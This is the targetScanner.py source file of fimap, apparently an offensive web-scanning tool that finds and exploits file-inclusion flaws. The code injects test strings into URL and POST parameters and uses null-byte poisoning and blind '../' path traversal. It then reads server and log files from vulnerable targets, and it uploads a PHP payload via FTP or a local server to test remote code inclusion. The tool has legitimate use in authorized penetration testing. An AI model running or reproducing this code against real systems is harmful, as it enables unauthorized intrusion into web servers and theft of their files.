/src/pentest/fimap/targetScanner.py
Python | 681 lines | 654 code | 8 blank | 19 comment | 33 complexity | 702622b70d3bd4ad2069e5d1bf7b46c1 MD5 | raw file
Possible License(s): BSD-3-Clause, AGPL-1.0, MPL-2.0-no-copyleft-exception, GPL-2.0, GPL-3.0
- #
- # This file is part of fimap.
- #
- # Copyright(c) 2009-2010 Iman Karim(ikarim2s@smail.inf.fh-brs.de).
- # http://fimap.googlecode.com
- #
- # This file may be licensed under the terms of of the
- # GNU General Public License Version 2 (the ``GPL'').
- #
- # Software distributed under the License is distributed
- # on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
- # express or implied. See the GPL for the specific language
- # governing rights and limitations.
- #
- # You should have received a copy of the GPL along with this
- # program. If not, go to http://www.gnu.org/licenses/gpl.html
- # or write to the Free Software Foundation, Inc.,
- # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
- #
- from config import settings
- import shutil
- import baseClass
- from report import report
- import re,os
- import os.path
- import posixpath
- import ntpath
- __author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
- __date__ ="$30.08.2009 19:59:44$"
- class targetScanner (baseClass.baseClass):
- def _load(self):
- self.MonkeyTechnique = False
- self._log("TargetScanner loaded.", self.LOG_DEBUG)
- self.params = {}
- self.postparams = {}
- def prepareTarget(self, url):
- self.Target_URL = url
- self._log("Parsing URL '%s'..."%(self.Target_URL), self.LOG_ALWAYS)
- if (self.Target_URL.find("?") == -1):
- self._log("Target URL doesn't have any params.", self.LOG_DEBUG);
- else:
- data = self.Target_URL.split("?")[1]
- if (data.find("&") == -1):
- self.__addToken(self.params, data)
- else:
- for ln in data.split("&"):
- self.__addToken(self.params, ln)
- post = self.config["p_post"]
- if (post != ""):
- if (post.find("&") == -1):
- self.__addToken(self.postparams, post)
- else:
- for ln in post.split("&"):
- self.__addToken(self.postparams, ln)
- return(len(self.params)>0 or len(self.postparams)>0)
- def analyzeURL(self, result, k, v, post=None, isPost=False):
- tmpurl = self.Target_URL
- tmppost = post
- rndStr = self.getRandomStr()
- if (not isPost):
- tmpurl = tmpurl.replace("%s=%s"%(k,v), "%s=%s"%(k, rndStr))
- else:
- tmppost = tmppost.replace("%s=%s"%(k,v), "%s=%s"%(k, rndStr))
- code = None
- if (post==None):
- self._log("Requesting: '%s'..." %(tmpurl), self.LOG_DEBUG)
- code = self.doGetRequest(tmpurl)
- else:
- self._log("Requesting: '%s' with POST('%s')..." %(tmpurl, post), self.LOG_DEBUG)
- code = self.doPostRequest(tmpurl, tmppost)
- xml2config = self.config["XML2CONFIG"]
- READFILE_ERR_MSG = xml2config.getAllReadfileRegex()
- if (code != None):
- disclosure_found = False
- for lang, ex in READFILE_ERR_MSG:
- RE_SUCCESS_MSG = re.compile(ex%(rndStr), re.DOTALL)
- m = RE_SUCCESS_MSG.search(code)
- if (m != None):
- if (not isPost):
- self._log("Possible local file disclosure found! -> '%s' with Parameter '%s'. (%s)"%(tmpurl, k, lang), self.LOG_ALWAYS)
- else:
- self._log("Possible local file disclosure found! -> '%s' with POST-Parameter '%s'. (%s)"%(tmpurl, k, lang), self.LOG_ALWAYS)
- #self.identifyReadFile(URL, Params, VulnParam)
- self._writeToLog("READ ; %s ; %s"%(tmpurl, k))
- disclosure_found = True
- break
- if (not disclosure_found):
- sniper_regex = xml2config.getAllSniperRegex()
- for lang, sniper in sniper_regex:
- RE_SUCCESS_MSG = re.compile(sniper%(rndStr), re.DOTALL)
- m = RE_SUCCESS_MSG.search(code)
- if (m != None):
- rep = None
- self._writeToLog("POSSIBLE ; %s ; %s"%(self.Target_URL, k))
- if (not isPost):
- self._log("[%s] Possible file inclusion found! -> '%s' with Parameter '%s'." %(lang, tmpurl, k), self.LOG_ALWAYS)
- rep = self.identifyVuln(self.Target_URL, self.params, k, post, lang)
- else:
- self._log("[%s] Possible file inclusion found! -> '%s' with POST-Parameter '%s'." %(lang, tmpurl, k), self.LOG_ALWAYS)
- rep = self.identifyVuln(self.Target_URL, self.postparams, k, post, lang, True)
-
-
- if (rep != None):
- rep.setVulnKeyVal(v)
- rep.setLanguage(lang)
- result.append((rep, self.readFiles(rep)))
- return(result)
- def analyzeURLblindly(self, i, testfile, k, v, find, goBackSymbols, post=None, isPost=False, isUnix=True):
- tmpurl = self.Target_URL
- tmppost = post
- rep = None
- doBreak = False
-
- if (not isPost):
- tmpurl = tmpurl.replace("%s=%s"%(k,v), "%s=%s"%(k, testfile))
-
- else:
- tmppost = tmppost.replace("%s=%s"%(k,v), "%s=%s"%(k, testfile))
-
- if (post != None and post != ""):
- self._log("Requesting: '%s'..." %(tmpurl), self.LOG_DEBUG)
- else:
- self._log("Requesting: '%s' with POST('%s')..." %(tmpurl, tmppost), self.LOG_DEBUG)
- code = self.doPostRequest(tmpurl, tmppost)
- if (code != None):
- if (code.find(find) != -1):
- self._log("Possible file inclusion found blindly! -> '%s' with Parameter '%s'." %(tmpurl, k), self.LOG_ALWAYS)
- doBreak = True
- if (not isPost):
- rep = self.identifyVuln(self.Target_URL, self.params, k, post, None, isPost, (goBackSymbols * i, False), isUnix)
- else:
- rep = self.identifyVuln(self.Target_URL, self.postparams, k, post, None, isPost, (goBackSymbols * i, False), isUnix)
- else:
- tmpurl = self.Target_URL
- tmpfile = testfile + "%00"
- postdata = post
- if (not isPost):
- tmpurl = tmpurl.replace("%s=%s"%(k,v), "%s=%s"%(k, tmpfile))
- else:
- postdata = postdata.replace("%s=%s"%(k,v), "%s=%s"%(k, tmpfile))
-
- if (post != None and post != ""):
- self._log("Requesting: '%s'..." %(tmpurl), self.LOG_DEBUG)
- else:
- self._log("Requesting: '%s' with POST('%s')..." %(tmpurl, postdata), self.LOG_DEBUG)
-
- code = self.doPostRequest(tmpurl, postdata)
- if (code.find(find) != -1):
- if (not isPost):
- self._log("Possible file inclusion found blindly! -> '%s' with Parameter '%s'." %(tmpurl, k), self.LOG_ALWAYS)
- else:
- self._log("Possible file inclusion found blindly! -> '%s' with POST-Parameter '%s'." %(tmpurl, k), self.LOG_ALWAYS)
- doBreak = True
- rep = self.identifyVuln(self.Target_URL, self.params, k, post, None, isPost, (goBackSymbols * i, True), isUnix)
- else:
- # Previous result was none. Assuming that we can break here.
- self._log("Code == None. Skipping testing of the URL.", self.LOG_DEBUG)
- doBreak = True
- return(rep, doBreak)
- def testTargetVuln(self):
- ret = []
- xml2config = self.config["XML2CONFIG"]
- self._log("Fiddling around with URL...", self.LOG_INFO)
- for k,v in self.params.items():
- self.analyzeURL(ret, k, v, self.config["p_post"], False)
- for k,v in self.postparams.items():
- self.analyzeURL(ret, k, v, self.config["p_post"], True)
-
- if (len(ret) == 0 and self.MonkeyTechnique):
- self._log("Sniper failed. Going blind...", self.LOG_INFO)
- files = xml2config.getBlindFiles()
- for fileobj in files:
- post = fileobj.getPostData()
- v = fileobj.getFindStr()
- f = fileobj.getFilepath()
-
- backSym = fileobj.getBackSymbols()
- for i in range(xml2config.getBlindMin(), xml2config.getBlindMax()):
- doBreak = False
- testfile = f
- if (i > 0):
- tmpf = f
- if (fileobj.isWindows()):
- tmpf = f[f.find(":")+1:]
- testfile = backSym * i + tmpf
- rep = None
- for k,V in self.params.items():
- rep, doBreak = self.analyzeURLblindly(i, testfile, k, V, v, backSym, self.config["p_post"], False, fileobj.isUnix())
- if (rep != None):
- rep.setVulnKeyVal(V)
- rep.setPostData(self.config["p_post"])
- ret.append((rep, self.readFiles(rep)))
- for k,V in self.postparams.items():
- rep, doBreak = self.analyzeURLblindly(i, testfile, k, V, v, backSym, self.config["p_post"], True, fileobj.isUnix())
- if (rep != None):
- rep.setVulnKeyVal(V)
- rep.setPostData(self.config["p_post"])
- rep.setPost(True)
- ret.append((rep, self.readFiles(rep)))
- if (doBreak): return(ret)
- return(ret)
- def identifyVuln(self, URL, Params, VulnParam, PostData, Language, isPost=False, blindmode=None, isUnix=None):
- xml2config = self.config["XML2CONFIG"]
-
- if (blindmode == None):
- script = None
- scriptpath = None
- pre = None
-
- langClass = xml2config.getAllLangSets()[Language]
-
- if (not isPost):
- self._log("[%s] Identifying Vulnerability '%s' with Parameter '%s'..."%(Language, URL, VulnParam), self.LOG_ALWAYS)
- else:
- self._log("[%s] Identifying Vulnerability '%s' with POST-Parameter '%s'..."%(Language, URL, VulnParam), self.LOG_ALWAYS)
- tmpurl = URL
- PostHax = PostData
- rndStr = self.getRandomStr()
- if (not isPost):
- tmpurl = tmpurl.replace("%s=%s"%(VulnParam,Params[VulnParam]), "%s=%s"%(VulnParam, rndStr))
- else:
- PostHax = PostHax.replace("%s=%s"%(VulnParam,Params[VulnParam]), "%s=%s"%(VulnParam, rndStr))
- RE_SUCCESS_MSG = re.compile(langClass.getSniper()%(rndStr), re.DOTALL)
- code = self.doPostRequest(tmpurl, PostHax)
- if (code == None):
- self._log("Identification of vulnerability failed. (code == None)", self.LOG_ERROR)
- return None
-
- m = RE_SUCCESS_MSG.search(code)
- if (m == None):
- self._log("Identification of vulnerability failed. (m == None)", self.LOG_ERROR)
- return None
- r = report(URL, Params, VulnParam)
- r.setPost(isPost)
- r.setPostData(PostData)
-
- for sp_err_msg in langClass.getIncludeDetectors():
- RE_SCRIPT_PATH = re.compile(sp_err_msg)
- s = RE_SCRIPT_PATH.search(code)
- if (s != None): break
- if (s == None):
- self._log("Failed to retrieve script path.", self.LOG_WARN)
- print "[MINOR BUG FOUND]"
- print "------------------------------------------------------"
- print "It's possible that fimap was unable to retrieve the scriptpath"
- print "because the regex for this kind of error message is missing."
- a = raw_input("Do you want to help me and send the URL of the site? [y = Print Info/N = Discard]")
- if (a=="y" or a=="Y"):
- print "-----------SEND THIS TO 'fimap.dev@gmail.com'-----------"
- print "SUBJECT: fimap Regex"
- print "ERROR : Failed to retrieve script path."
- print "URL : " + URL
- print "-----------------------------------------------------------"
- raw_input("Copy it and press enter to proceed with scanning...")
- else:
- print "No problem! I'll continue with your scan..."
- return(None)
- else:
- script = s.group('script')
- if (script != None and script[1] == ":"): # Windows detection quick hack
- scriptpath = script[:script.rfind("\\")]
- r.setWindows()
- elif (script != None and script.startswith("\\\\")):
- scriptpath = script[:script.rfind("\\")]
- r.setWindows()
- else:
- scriptpath = os.path.dirname(script)
- if (scriptpath == None or scriptpath == ""):
- self._log("Scriptpath is empty! Assuming that we are on toplevel.", self.LOG_WARN)
- scriptpath = "/"
- script = "/" + script
- # Check if scriptpath was received correctly.
- if(scriptpath!=""):
- self._log("Scriptpath received: '%s'" %(scriptpath), self.LOG_INFO)
- r.setServerPath(scriptpath)
- r.setServerScript(script)
- if (r.isWindows()):
- self._log("Operating System is 'Windows'.", self.LOG_INFO)
- else:
- self._log("Operating System is 'Unix-Like'.", self.LOG_INFO)
- errmsg = m.group("incname")
- if (errmsg == rndStr):
- r.setPrefix("")
- r.setSurfix("")
- else:
- tokens = errmsg.split(rndStr)
- pre = tokens[0]
- addSlash = False
- if (pre == ""):
- pre = "/"
- #else:
- # if pre[-1] != "/":
- # addSlash = True
- rootdir = None
-
- if (pre[0] != "/"):
- if (r.isUnix()):
- pre = posixpath.join(r.getServerPath(), pre)
- pre = posixpath.normpath(pre)
- rootdir = "/"
- pre = self.relpath_unix(rootdir, pre)
- else:
- pre = ntpath.join(r.getServerPath(), pre)
- pre = ntpath.normpath(pre)
- if (pre[1] == ":"):
- rootdir = pre[0:3]
- pre = self.relpath_win(rootdir, pre)
- else:
- pre = self.relpath_unix("/", pre)
- if addSlash: pre = rootdir + pre
-
- #Quick fix for increasing success :P
- if (pre != "."):
- pre = "/" + pre
-
- sur = tokens[1]
- if (pre == "."): pre = ""
- r.setPrefix(pre)
- r.setSurfix(sur)
- if (sur != ""):
- self._log("Trying NULL-Byte Poisoning to get rid of the suffix...", self.LOG_INFO)
- tmpurl = URL
- tmpurl = tmpurl.replace("%s=%s"%(VulnParam,Params[VulnParam]), "%s=%s%%00"%(VulnParam, rndStr))
- code = self.doGetRequest(tmpurl)
- if (code == None):
- self._log("NULL-Byte testing failed.", self.LOG_WARN)
- r.setNullBytePossible(False)
- elif (code.find("%s\\0%s"%(rndStr, sur)) != -1 or code.find("%s%s"%(rndStr, sur)) != -1):
- self._log("NULL-Byte Poisoning not possible.", self.LOG_INFO)
- r.setNullBytePossible(False)
- else:
- self._log("NULL-Byte Poisoning successfull!", self.LOG_INFO)
- r.setSurfix("%00")
- r.setNullBytePossible(True)
- if (scriptpath == ""):
- # Failed to get scriptpath with easy method :(
- if (pre != ""):
- self._log("Failed to retrieve path but we are forced to go relative!", self.LOG_WARN)
- self._log("Go and try it to scan with --enable-blind.", self.LOG_WARN)
- return(None)
- else:
- self._log("Failed to retrieve path! It's an absolute injection so I'll fake it to '/'...", self.LOG_WARN)
- scriptpath = "/"
- r.setServerPath(scriptpath)
- r.setServerScript(script)
- return(r)
-
-
- else:
- # Blindmode
- prefix = blindmode[0]
- isNull = blindmode[1]
- self._log("Identifying Vulnerability '%s' with Parameter '%s' blindly..."%(URL, VulnParam), self.LOG_ALWAYS)
- r = report(URL, Params, VulnParam)
- r.setBlindDiscovered(True)
- r.setSurfix("")
- if isNull: r.setSurfix("%00")
- r.setNullBytePossible(isNull)
- if (prefix.strip() == ""):
- r.setServerPath("/noop")
- else:
- r.setServerPath(prefix.replace("..", "a"))
- r.setServerScript("noop")
- r.setPrefix(prefix)
- if (not isUnix):
- r.setWindows()
- return(r)
- def readFiles(self, rep):
- xml2config = self.config["XML2CONFIG"]
- langClass = None
- if rep.isLanguageSet():
- langClass = xml2config.getAllLangSets()[rep.getLanguage()]
- else:
- if (self.config["p_autolang"]):
- self._log("Unknown language - Autodetecting...", self.LOG_WARN)
- if (rep.autoDetectLanguageByExtention(xml2config.getAllLangSets())):
- self._log("Autodetect thinks this could be a %s-Script..."%(rep.getLanguage()), self.LOG_INFO)
- self._log("If you think this is wrong start fimap with --no-auto-detect", self.LOG_INFO)
- langClass = xml2config.getAllLangSets()[rep.getLanguage()]
- else:
- self._log("Autodetect failed!", self.LOG_ERROR)
- return([])
- else:
- self._log("Unknown language! You have told me to let you choose - here we go.", self.LOG_WARN)
- boxheader = "Choose language for URL: %s" %(rep.getURL())
- boxarr = []
- choose = []
- idx = 0
- for Name, langClass in xml2config.getAllLangSets().items():
- boxarr.append("[%d] %s"%(idx+1, Name))
- choose.append(Name)
- idx += 1
- boxarr.append("[q] Quit")
- self.drawBox(boxheader, boxarr)
- inp = ""
- while (1==1):
- inp = raw_input("Script number: ")
- if (inp == "q" or inp == "Q"):
- return([])
- else:
- try:
- idx = int(inp)
- if (idx < 1 or idx > len(choose)):
- print "Choose out of range..."
- else:
- rep.setLanguage(choose[idx-1])
- langClass = xml2config.getAllLangSets()[rep.getLanguage()]
- break
- except:
- print "Invalid Number!"
-
-
-
- files = xml2config.getRelativeFiles(rep.getLanguage())
- abs_files = xml2config.getAbsoluteFiles(rep.getLanguage())
- rmt_files = xml2config.getRemoteFiles(rep.getLanguage())
- log_files = xml2config.getLogFiles(rep.getLanguage())
- rfi_mode = settings["dynamic_rfi"]["mode"]
- ret = []
- self._log("Testing default files...", self.LOG_DEBUG)
- for fileobj in files:
- post = fileobj.getPostData()
- p = fileobj.getFindStr()
- f = fileobj.getFilepath()
- type = fileobj.getFlags()
- quiz = answer = None
- if (post != None):
- quiz, answer = langClass.generateQuiz()
- post = post.replace("__QUIZ__", quiz)
- p = p.replace("__ANSWER__", answer)
-
- if ((rep.getSurfix() == "" or rep.isNullbytePossible() or f.endswith(rep.getSurfix()))):
- if (rep.isUnix() and fileobj.isUnix() or rep.isWindows() and fileobj.isWindows()):
- if (self.readFile(rep, f, p, POST=post)):
- ret.append(f)
- self.addXMLLog(rep, type, f)
- else:
- pass
- else:
- self._log("Skipping file '%s' because it's not suitable for our OS."%f, self.LOG_DEBUG)
- else:
- self._log("Skipping file '%s'."%f, self.LOG_INFO)
- self._log("Testing absolute files...", self.LOG_DEBUG)
- for fileobj in abs_files:
- post = fileobj.getPostData()
- p = fileobj.getFindStr()
- f = fileobj.getFilepath()
- type = fileobj.getFlags()
- canbreak = fileobj.isBreakable()
-
- quiz = answer = None
- if (post != None):
- quiz, answer = langClass.generateQuiz()
- post = post.replace("__QUIZ__", quiz)
- p = p.replace("__ANSWER__", answer)
- if (rep.getPrefix() == "" and(rep.getSurfix() == "" or rep.isNullbytePossible() or f.endswith(rep.getSurfix()) or canbreak)):
- if canbreak:
- #SUPERDUPER URL HAX!
- rep.setSurfix("&")
-
- if (rep.isUnix() and fileobj.isUnix() or rep.isWindows() and fileobj.isWindows()):
- if (self.readFile(rep, f, p, True, POST=post)):
- ret.append(f)
- self.addXMLLog(rep, type, f)
- else:
- pass
- else:
- self._log("Skipping absolute file '%s' because it's not suitable for our OS."%f, self.LOG_DEBUG)
- else:
- self._log("Skipping absolute file '%s'."%f, self.LOG_INFO)
- self._log("Testing log files...", self.LOG_DEBUG)
- for fileobj in log_files:
- post = fileobj.getPostData()
- p = fileobj.getFindStr()
- f = fileobj.getFilepath()
- type = fileobj.getFlags()
-
- if ((rep.getSurfix() == "" or rep.isNullbytePossible() or f.endswith(rep.getSurfix()))):
- if (rep.isUnix() and fileobj.isUnix() or rep.isWindows() and fileobj.isWindows()):
- if (self.readFile(rep, f, p)):
- ret.append(f)
- self.addXMLLog(rep, type, f)
- else:
- pass
- else:
- self._log("Skipping log file '%s' because it's not suitable for our OS."%f, self.LOG_DEBUG)
- else:
- self._log("Skipping log file '%s'."%f, self.LOG_INFO)
- if (rfi_mode in ("ftp", "local")):
- if (rfi_mode == "ftp"): self._log("Testing remote inclusion dynamicly with FTP...", self.LOG_INFO)
- if (rfi_mode == "local"): self._log("Testing remote inclusion dynamicly with local server...", self.LOG_INFO)
- if (rep.getPrefix() == ""):
- fl = up = None
- if (rfi_mode == "ftp"):
- fl = settings["dynamic_rfi"]["ftp"]["ftp_path"] + rep.getAppendix()
- up = self.FTPuploadFile(settings["php_info"][0], rep.getAppendix())
- # Discard the suffix if there is a forced directory structure.
- if (not up["http"].endswith(rep.getAppendix())):
- rep.setSurfix("")
-
- elif(rfi_mode == "local"):
- up = self.putLocalPayload(settings["php_info"][0], rep.getAppendix())
- if (not up["http"].endswith(rep.getAppendix())):
- rep.setSurfix("")
- if (self.readFile(rep, up["http"], settings["php_info"][1], True)):
- ret.append(up["http"])
- rep.setRemoteInjectable(True)
- self.addXMLLog(rep, "rxR", up["http"])
- if (rfi_mode == "ftp"):
- if up["dirstruct"]:
- self.FTPdeleteDirectory(up["ftp"])
- else:
- self.FTPdeleteFile(up["ftp"])
- if (rfi_mode == "local"):
- self.deleteLocalPayload(up["local"])
- else:
- self._log("Testing remote inclusion...", self.LOG_DEBUG)
- for fileobj in rmt_files:
- post = fileobj.getPostData()
- p = fileobj.getFindStr()
- f = fileobj.getFilepath()
- type = fileobj.getFlags()
- canbreak = fileobj.isBreakable()
-
- if (rep.getPrefix() == "" and(rep.getSurfix() == "" or rep.isNullbytePossible() or f.endswith(rep.getSurfix()) or canbreak)):
- if ((not rep.isNullbytePossible() and not rep.getSurfix() == "") and f.endswith(rep.getSurfix())):
- f = f[:-len(rep.getSurfix())]
- rep.setSurfix("")
- elif (canbreak):
- #SUPERDUPER URL HAX!
- rep.setSurfix("&")
-
- if (rep.isUnix() and fileobj.isUnix() or rep.isWindows() and fileobj.isWindows()):
- if (self.readFile(rep, f, p, True)):
- ret.append(f)
- rep.setRemoteInjectable(True)
- self.addXMLLog(rep, type, f)
- else:
- pass
- else:
- self._log("Skipping remote file '%s' because it's not suitable for our OS."%f, self.LOG_DEBUG)
- else:
- self._log("Skipping remote file '%s'."%f, self.LOG_INFO)
- self.saveXML()
- return(ret)
- def readFile(self, report, filepath, filepattern, isAbs=False, POST=None):
- self._log("Testing file '%s'..." %filepath, self.LOG_INFO)
-
- xml2config = self.config["XML2CONFIG"]
- langClass = xml2config.getAllLangSets()[report.getLanguage()]
-
- tmpurl = report.getURL()
- prefix = report.getPrefix()
- surfix = report.getSurfix()
- vuln = report.getVulnKey()
- params = report.getParams()
- isunix = report.isUnix()
-
- scriptpath = report.getServerPath()
-
- postdata = None
- isPost = report.isPost
- if (isPost):
- postdata = report.getPostData()
- filepatha = ""
- if (prefix != None and prefix != "" and prefix[-1] == "/"):
- prefix = prefix[:-1]
- report.setPrefix(prefix)
- if (filepath[0] == "/"):
- filepatha = prefix + filepath
- if (report.isWindows() and len(prefix.strip()) > 0 and not isAbs):
- filepatha = prefix + filepath[3:]
- elif len(prefix.strip()) > 0 and not isAbs:
- filepatha = prefix + "/" + filepath
- else:
- filepatha = filepath
- if (scriptpath[-1] != "/" and filepatha[0] != "/" and not isAbs and report.isUnix()):
- filepatha = "/" + filepatha
- payload = "%s%s"%(filepatha, surfix)
- if (not isPost):
- tmpurl = tmpurl.replace("%s=%s" %(vuln, params[vuln]), "%s=%s"%(vuln, payload))
- else:
- postdata = postdata.replace("%s=%s" %(vuln, params[vuln]), "%s=%s"%(vuln, payload))
- self._log("Testing URL: " + tmpurl, self.LOG_DEBUG)
- RE_SUCCESS_MSG = re.compile(langClass.getSniper()%(filepath), re.DOTALL)
- code = None
- if (POST != None or postdata != None):
- if (postdata != None):
- if (POST == None):
- POST = postdata
- else:
- POST = "%s&%s"%(postdata, POST)
- code = self.doPostRequest(tmpurl, POST)
- else:
- code = self.doGetRequest(tmpurl)
- if (code == None):
- return(False)
- m = RE_SUCCESS_MSG.search(code)
- if (m == None):
- if (filepattern == None or code.find(filepattern) != -1):
- #self._writeToLog("VULN;%s;%s;%s;%s"%(tmpurl, vuln, payload, filepath))
- return(True)
- return(False)
- def __addToken(self, arr, token):
- if (token.find("=") == -1):
- arr[token] = ""
- self._log("Token found: [%s] = none" %(token), self.LOG_DEBUG)
- else:
- k = token.split("=")[0]
- v = token.split("=")[1]
- arr[k] = v
- self._log("Token found: [%s] = [%s]" %(k,v), self.LOG_DEBUG)